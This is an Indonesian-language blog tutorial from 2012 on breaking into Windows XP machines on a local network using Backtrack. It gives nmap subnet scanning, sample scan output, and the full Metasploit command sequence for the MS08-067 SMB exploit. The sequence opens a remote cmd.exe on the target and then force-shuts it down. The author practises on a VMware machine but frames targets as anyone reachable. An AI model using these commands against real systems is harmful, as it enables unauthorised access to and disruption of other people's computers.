Comments

Wednesday, September 19, 2012

Exploit windows XP dengan Backtrack

Posted by at 7:07 AM Read our previous post
Tutorial exploit windows XP dengan Backtrack dapat menggunakan tools, yaitu msfconsole. Msfconsole ini merupakan tools yang ada pada Backtrack yang berfungsi untuk masuk kedalam sistem operasi Windows. Masuk melalui cmd, dan setelah masuk kita bisa mengendalikan target melalui perintah di cmd.

Skenario dalam Exploit windows XP dengan Backtrack adalah kita berada pada satu jaringan dengan target. Menurut saya target disini adalah random, yang bisa diserang maka diserang. *gunakan etika lho, angan asal nyerang*.

Persiapan dalam Exploit windows XP dengan Backtrack adalah :

  • nmap , untuk scan jaringan dan siapa saja yang terkoneksi dengan jaringan

  • msfconsole , untuk masuk dan Exploit windows XP


Sebagai contoh saya menggunakan virtual machine, dengan vmware yang sudah diinstal dengan Windows XP. Sudah saya set supaya Backtrack di laptop saya satu jaringan dengan Windows XP di Vmware.

Berikut langkah langkah dalam Exploit windows XP dengan Backtrack :

  1. Cek IP Address pada Backtrack, dengan perintah ifconfig IP tersebut saya dapatkan karena saya satu jaringan dengan dengan VMware

  2. Scan jaringan dengan nmap dengan mengambil IP address tadi. Scan dengan batasan /24 (supaya terdapat daftar user yang banyak). Gunakan perintah nmap 192.168.148.0/24 . Digunakan untuk melihat ip adress mana saja yang terpakai.

  3. Terlihat pada hasil scan ada user yang aktif dan ada port yang terbuka

  4. Hasil Scan User : Nmap scan report for 192.168.148.128
    Host is up (0.00027s latency).
    Not shown: 997 closed ports
    PORT    STATE SERVICE
    135/tcp open  msrpc
    139/tcp open  netbios-ssn
    445/tcp open  microsoft-ds
    MAC Address: 00:0C:29:B4:DC:70 (VMware)

  5. Masuk ke dalam tools msfconsole dengan mengetik perintah msfconsole Ketika sudah sampai ke msf> maka sudah masuk.

  6. Lakukan perintah exploit sebagai berikut :
    set lhost 192.168.148.1 , set IP backtrack milik kita
    set rhost 192.168.148.128 , set IP milik target
    use exploit/windows/smb/ms08_067_netapi , set metode exploit
    exploit , eksekusi exploit
    execute -f cmd.exe -M -i , menjalankan cmd.exe milik target
    Berikut ini screenshootnya :

    Sudah masuk ke dalam cmd milik target.

  7. Tampilan cmd saya dengan target

  8. Contoh exploit saya, shutdown /s /f /t 60 , mematikan komputer dalam 60 detik .


Demikian tutorial Exploit windows XP dengan Backtrack , semoga bermanfaat.
Diposkan oleh di
Label: , , , , , , , , , , ,

4 comments:

Subscribe to: Post Comments (Atom)
©2012 How To For is powered by Blogger - Template designed by Stramaxon - Best SEO Template